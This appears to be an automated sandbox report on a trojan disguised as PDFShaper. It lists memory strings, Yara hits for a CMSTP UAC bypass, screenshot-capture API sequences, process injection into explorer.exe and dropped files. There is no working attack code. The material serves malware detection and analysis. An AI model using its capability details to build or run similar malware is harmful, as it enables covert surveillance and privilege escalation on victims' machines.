Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestamp
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestampNhttps://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/&4D
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/ndows.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/property#HR
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/buy.htmlopenU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/download.htmlopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/update.verU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.comP
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.comopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.winsoft.skU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.xfa.org/schema/xfa-template/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://xml.org/sax/properties/declaration-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: https://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: https://www.winsoft.sk

Contains functionality to record screenshots

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007661F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

14_2_007661F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Contains functionality to call native functions

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Code function: 0_2_00799962 NtQuerySystemInformation,

0_2_00799962

Detected potential crypto function

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007661F0	14_2_007661F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0076B700	14_2_0076B700
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D80EA	14_2_007D80EA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007651A0	14_2_007651A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078F3EB	14_2_0078F3EB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0079C467	14_2_0079C467
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00765450	14_2_00765450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078B4B0	14_2_0078B4B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A1679	14_2_007A1679
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00792930	14_2_00792930
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A5A76	14_2_007A5A76
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D8A00	14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A5B96	14_2_007A5B96
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0079CC09	14_2_0079CC09
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A3DE9	14_2_007A3DE9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00764EF0	14_2_00764EF0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00789D11 appears 60 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0078A560 appears 50 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00783F40 appears 136 times

PE / OLE file has an invalid certificate

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000055DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000047FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezip.exe( vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Binary or memory string: OriginalFilenamePDFShaper.exe6 vs 5Z1WFRMTOXRH6X21Z8NU8.exe

Uses 32bit PE files

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@13/7@3/1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

14_2_0076E8D0

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Roaming\LogiOptionsPlus

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

File created: C:\Users\user\AppData\Local\Temp\9c813d63

Jump to behavior

Source: Yara match	File source: 5Z1WFRMTOXRH6X21Z8NU8.exe, type: SAMPLE
Source: Yara match	File source: 0.0.5Z1WFRMTOXRH6X21Z8NU8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

ReversingLabs: Detection: 18%

Source: explorer.exe	String found in binary or memory: " /add
Source: explorer.exe	String found in binary or memory: " /add /y
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: %%DebenuPDFLibrary-Start
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: SetLicenseKeyErrorPDW32.dll is not found. Please re-install program as administrator.S
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: EActiveX DLL is not found. Please re-install program as administrator.U
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: :The help file is not found. Please re-install the program.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: document-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: document-text-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: file-image-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: folder-add-2_large@1x

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

